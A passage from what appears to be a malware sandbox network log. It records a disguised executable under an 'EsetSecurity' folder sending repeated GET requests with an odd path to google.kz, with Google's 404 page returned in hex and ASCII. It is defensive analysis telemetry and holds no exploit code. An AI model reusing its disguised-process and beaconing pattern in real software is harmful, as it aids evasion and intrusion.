no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.703232050 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.803287983 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.803325891 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.904077053 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.904226065 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:07.005052090 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:07.106242895 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:07.114408970 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:07.234458923 CET	500	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 [TRUNCATED] Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.16	49752	172.217.19.164	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:03.961611032 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Dec 1, 2024 22:52:05.517887115 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:05.517906904 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:05.535717964 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:05.655818939 CET	350	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Dec 1, 2024 22:52:05.920072079 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:06.040157080 CET	100	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Dec 1, 2024 22:52:06.136085033 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.136132002 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:06.324038029 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:06.324151993 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
